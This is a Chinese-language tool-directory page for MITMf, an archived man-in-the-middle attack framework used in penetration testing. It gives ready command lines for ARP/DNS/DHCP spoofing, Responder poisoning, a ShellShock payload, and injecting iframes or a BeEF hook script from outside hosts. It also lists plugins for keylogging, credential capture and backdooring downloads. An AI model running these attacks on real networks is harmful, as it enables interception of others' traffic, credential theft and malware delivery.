Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
MITMf — 用于中间人攻击的框架 | Kitploit
工具/GitHubGitHub/byt3bl33d3r/mitmf
数据包嗅探与分析漏洞利用钓鱼攻击Web安全网络安全渗透测试命令与控制社会工程学身份验证红队DNS 分析Archived
3.6k1.0k7年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHub
byt3bl33d3r/mitmf

MITMf

用于中间人攻击的框架

查看仓库

Supported Python versions Latest Version Supported OS Code Climate Build Status Coverage Status

MITMf

中间人攻击框架

此项目不再更新。MITMf 当初是为了满足当时对执行中间人攻击的现代工具的需求而编写的。自那以后,许多其他工具填补了这一空白,您可能应该使用 Bettercap,因为它功能更加完善且维护得更好。

快速教程、示例和开发者更新请访问:https://byt3bl33d3r.github.io

本工具基于 sergio-proxy,是对该项目的尝试性复活与更新。

联系我:

  • Twitter: @byt3bl33d3r
  • IRC on Freenode: #MITMf
  • 邮箱: [email protected]

在提交问题之前,请先阅读维基中的相关章节。

安装

请参阅维基中的安装说明

描述

MITMf 旨在为中间人攻击和网络攻击提供一站式解决方案,同时更新和改进现有攻击技术。

最初是为了解决其他工具(如 Ettercap、Mallory)的显著缺陷而构建,现已几乎完全从头重写,提供一个模块化、易于扩展的框架,任何人都可用来实现自己的 MITM 攻击。

特性

  • 框架内置了 SMB、HTTP 和 DNS 服务器,可供各插件控制和调用,还包含一个修改版的 SSLStrip 代理,支持 HTTP 修改和部分 HSTS 绕过。

  • 从 0.9.8 版本开始,MITMf 支持主动数据包过滤和操控(本质上相当于 etterfilter 但更强大),允许用户修改任何类型的流量或协议。

  • MITMf 运行时,配置文件可以实时编辑,更改会传递到整个框架:这允许你在攻击过程中调整插件和服务器的设置。

  • MITMf 会通过 Net-Creds 捕获 FTP、IRC、POP、IMAP、Telnet、SMTP、SNMP(团体字符串)、NTLMv1/v2(所有支持协议如 HTTP、SMB、LDAP 等)以及 Kerberos 凭据,该工具在启动时运行。

  • Responder 集成支持 LLMNR、NBT-NS 和 MDNS 投毒,以及 WPAD 恶意服务器。

主动数据包过滤/修改

现在你可以使用 Scapy 修改任何经 MITMf 拦截的数据包/协议!(不再需要 etterfilter!耶!)

例如,一个简单的小过滤器,仅修改 ICMP 数据包的目标 IP 地址:

root@kitploit:~
if packet.haslayer(ICMP):
	log.info('Got an ICMP packet!')
	packet.dst = '192.168.1.0'
  • 使用 packet 变量以 Scapy 兼容格式访问数据包
  • 使用 data 变量访问原始数据包数据

使用该过滤器只需:python mitmf.py -F ~/filter.py

你可能想将其与 Spoof 插件结合使用,以实际拦截来自他人的流量 ;)

注意:你可以在不重启 MITMf 的情况下实时修改过滤器!

示例

最基本的用法,在接口 enp3s0 上启动 HTTP 代理、SMB、DNS、HTTP 服务器和 Net-Creds:

python mitmf.py -i enp3s0

使用 Spoof 插件,对网关为 192.168.1.1 的整个子网进行 ARP 投毒:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1

同上,但使用 Responder 插件添加 WPAD 恶意代理服务器:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad

对 192.168.1.16-45 和 192.168.0.1/24 进行 ARP 投毒,网关为 192.168.1.1:

python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1

在 ARP 投毒的同时启用 DNS 欺骗(要欺骗的域名从配置文件中读取):

python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1

启用 LLMNR/NBTNS/MDNS 欺骗:

python mitmf.py -i enp3s0 --responder --wredir --nbtns

启用 DHCP 欺骗(IP 池和子网从配置文件中读取):

python mitmf.py -i enp3s0 --spoof --dhcp

同上,但添加 ShellShock 有效载荷,若任何客户端存在漏洞则执行:

python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'

使用 Inject 插件注入 HTML IFrame:

python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com

注入 JS 脚本:

python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js

启动一个将 HTTP 重定向到 http://SERVER/PATH 的强制门户:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portalurl http://SERVER/PATH

启动强制门户,默认页面为 /portal.html(感谢 responder)以及 /CaptiveClient.exe(未包含),均位于 config/captive 目录:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive

同上,但使用主机名 captive.portal 而非 IP(要求 captive.portal 解析到你的 IP,例如通过 DNS 欺骗):

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --use-dns

提供一个强制门户,并额外启动一个 SimpleHTTPServer 实例提供 LOCALDIR 目录内容,地址为 http://IP:8080(在 mitmf.config 中更改端口):

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portaldir LOCALDIR

同上,但使用主机名:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --portaldir LOCALDIR --use-dns

还有更多!

当然,你可以任意组合几乎所有插件(例如 ARP 欺骗 + 注入 + Responder 等)

要查看所有可用选项,只需运行 python mitmf.py --help

目前可用的插件

  • HTA Drive-By : 注入虚假更新通知,提示客户端下载 HTA 应用程序
  • SMBTrap : 利用已连接客户端的 'SMB Trap' 漏洞
  • ScreenShotter : 使用 HTML5 Canvas 渲染客户端浏览器的精确截图
  • Responder : LLMNR、NBT-NS、WPAD 和 MDNS 投毒器
  • SSLstrip+ : 部分绕过 HSTS
  • Spoof : 使用 ARP、ICMP、DHCP 或 DNS 欺骗重定向流量
  • BeEFAutorun : 根据客户端的操作系统或浏览器类型自动运行 BeEF 模块
  • AppCachePoison : 执行 HTML5 应用缓存投毒攻击
  • Ferret-NG : 透明劫持客户端会话
  • BrowserProfiler : 尝试枚举已连接客户端的所有浏览器插件
  • FilePwn : 使用 Backdoor Factory 和 BDFProxy 对通过 HTTP 传输的可执行文件加后门
  • Inject : 向 HTML 内容中注入任意内容
  • BrowserSniper : 对浏览器插件过时的客户端执行路过式攻击
  • JSkeylogger : 在客户端网页中注入 JavaScript 键盘记录器
  • Replace : 替换 HTML 内容中的任意内容
  • SMBAuth : 引发 SMB 挑战-响应认证尝试
  • Upsidedownternet : 将图片旋转 180 度
  • Captive : 创建强制门户,使用 302 重定向 HTTP 请求

如何支持我的茶叶与寿司储备

BTC: 1ER8rRE6NTZ7RHN88zc6JY87LvtyuRUJGU

ETH: 0x91d9aDCf8B91f55BCBF0841616A01BeE551E90ee

LTC: LLMa2bsvXbgBGnnBwiXYazsj7Uz6zRe4fr

下载工具